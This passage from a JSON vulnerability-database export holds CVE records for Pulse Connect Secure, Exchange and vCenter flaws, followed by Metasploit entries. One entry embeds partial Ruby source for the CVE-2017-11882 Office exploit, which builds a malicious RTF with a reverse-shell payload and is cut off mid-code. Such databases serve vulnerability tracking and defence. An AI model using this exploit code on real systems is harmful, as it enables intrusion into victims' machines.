"cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r10.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r4.3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r4:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r7:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r6.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r4.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r8.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r4.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r4.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r11.3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r1.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r4.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:-:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r2.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r8.4:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r11.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r9.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r2.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:-:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r4:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0rx:*:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3.5:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r8:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3.3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r8.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r6:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r9.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r5.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r5:*:*:*:*:*:*"]}, {"lastseen": "2021-06-05T07:38:28", "description": "A vulnerability allowed multiple unrestricted uploads in Pulse Connect Secure before 9.1R11.4 that could lead to an authenticated administrator to perform a file write via a maliciously crafted archive upload in the administrator web interface.", "edition": 3, "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-27T12:15:00", "title": "CVE-2021-22900", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22900"], "modified": "2021-06-04T18:35:00", "cpe": ["cpe:/a:pulsesecure:pulse_connect_secure:9.0", "cpe:/a:pulsesecure:pulse_connect_secure:9.1"], "id": "CVE-2021-22900", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22900", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r10.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r9:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r11.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r10.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r4.3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r4:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r7:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r6.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r4.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r8.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r4.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r4.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r11.3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r1.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r4.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:-:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r2.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r8.4:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r11.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r9.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r2.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:-:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r4:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3.5:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r8:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3.3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r8.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r6:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r9.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r5.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r5:*:*:*:*:*:*"]}, {"lastseen": "2021-04-29T09:46:35", "description": "Pulse Connect Secure 9.0R3/9.1R1 and higher is vulnerable to an authentication bypass vulnerability exposed by the Windows File Share Browser and Pulse Secure Collaboration features of Pulse Connect Secure that can allow an unauthenticated user to perform remote arbitrary code execution on the Pulse Connect Secure gateway. This vulnerability has been exploited in the wild.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-23T17:15:00", "title": "CVE-2021-22893", "type": "cve", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2021-04-28T17:52:00", "cpe": ["cpe:/a:pulsesecure:pulse_connect_secure:9.0", "cpe:/a:pulsesecure:pulse_connect_secure:9.1"], "id": "CVE-2021-22893", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22893", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r10.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r9:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r11.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r10.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r4.3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r4:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r7:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r6.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r4.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r8.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r4.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r11.3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r4.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:-:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r8.4:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r11.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r9.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r2.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:-:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r4:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3.5:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r8:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3.3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r8.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r6:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r9.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r5.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r5:*:*:*:*:*:*"]}, {"lastseen": "2021-04-28T11:49:14", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26857, CVE-2021-27065, CVE-2021-27078.", "edition": 4, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-03T00:15:00", "title": "CVE-2021-26858", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26858"], "modified": "2021-03-08T20:46:00", "cpe": ["cpe:/a:microsoft:exchange_server:2016", "cpe:/a:microsoft:exchange_server:2013", "cpe:/a:microsoft:exchange_server:2019"], "id": "CVE-2021-26858", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-26858", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_19:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_18:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_8:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_7:*:*:*:*:*:*"]}, {"lastseen": "2021-09-15T07:26:21", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-26T15:15:00", "title": "CVE-2021-21985", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985"], "modified": "2021-09-14T17:37:00", "cpe": ["cpe:/a:vmware:vcenter_server:7.0", "cpe:/a:vmware:vcenter_server:6.7", "cpe:/a:vmware:vcenter_server:6.5"], "id": "CVE-2021-21985", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21985", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:vmware:vcenter_server:6.5:e:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update2a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1e:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3f:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update1c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update1d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3f:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update2c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3l:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3j:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update1b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2g:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update2:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3m:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update1a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3n:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1g:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3g:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:f:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update2:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update1:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update2a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3k:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update1:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:-:*:*:*:*:*:*"]}], "metasploit": [{"lastseen": "2021-04-07T22:49:38", "description": "There exists a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Microsoft CVE-2021-26858: Microsoft Exchange Server Remote Code Execution Vulnerability (HAFNIUM Exploited)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26858"], "modified": "1976-01-01T00:00:00", "id": "MSF:ILITIES/MSFT-CVE-2021-26858/", "href": "", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T09:46:17", "description": "Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory.\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Microsoft Office CVE-2017-11882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "1976-01-01T00:00:00", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::Powershell\n include Msf::Exploit::EXE\n include Msf::Exploit::FILEFORMAT\n\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft Office CVE-2017-11882',\n 'Description' => %q{\n Module exploits a flaw in how the Equation Editor that\n allows an attacker to execute arbitrary code in RTF files without\n interaction. The vulnerability is caused by the Equation Editor,\n to which fails to properly handle OLE objects in memory.\n },\n 'Author' => ['mumbai', 'embedi'],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2017-11-15',\n 'References' => [\n ['CVE', '2017-11882'],\n ['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'],\n ['URL', 'https://github.com/embedi/CVE-2017-11882']\n ],\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n ['Microsoft Office', {} ],\n ],\n 'DefaultTarget' => 0,\n 'Payload' => {\n 'DisableNops' => true\n },\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/meterpreter/reverse_tcp'\n }\n ))\n\n register_options([\n OptString.new(\"FILENAME\", [true, \"Filename to save as, or inject\", \"msf.rtf\"]),\n OptString.new(\"FOLDER_PATH\", [false, \"Path to file to inject\", nil])\n ])\n end\n\n def retrieve_header(filename)\n if (not datastore['FOLDER_PATH'].nil?)\n path = \"#{datastore['FOLDER_PATH']}/#{datastore['FILENAME']}\"\n else\n path = nil\n end\n if (not path.nil?)\n if ::File.file?(path)\n File.open(path, 'rb') do |fd|\n header = fd.read(fd.stat.size).split('{\\*\\datastore').first\n header = header.to_s # otherwise I get nil class...\n print_status(\"Injecting #{path}...\")\n return header\n end\n else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\n end\n else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\n end\n return header\n end\n\n\n\n def generate_rtf\n header = retrieve_header(datastore['FILENAME'])\n object_class = '{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}\\objw380\\objh260{\\*\\objdata '\n object_class << '01050000020000000b0000004571756174696f6e2e33000000000000000000000'\n object_class << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'\n object_class << '09000600000000000000000000000100000001000000000000000010000002000'\n object_class << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 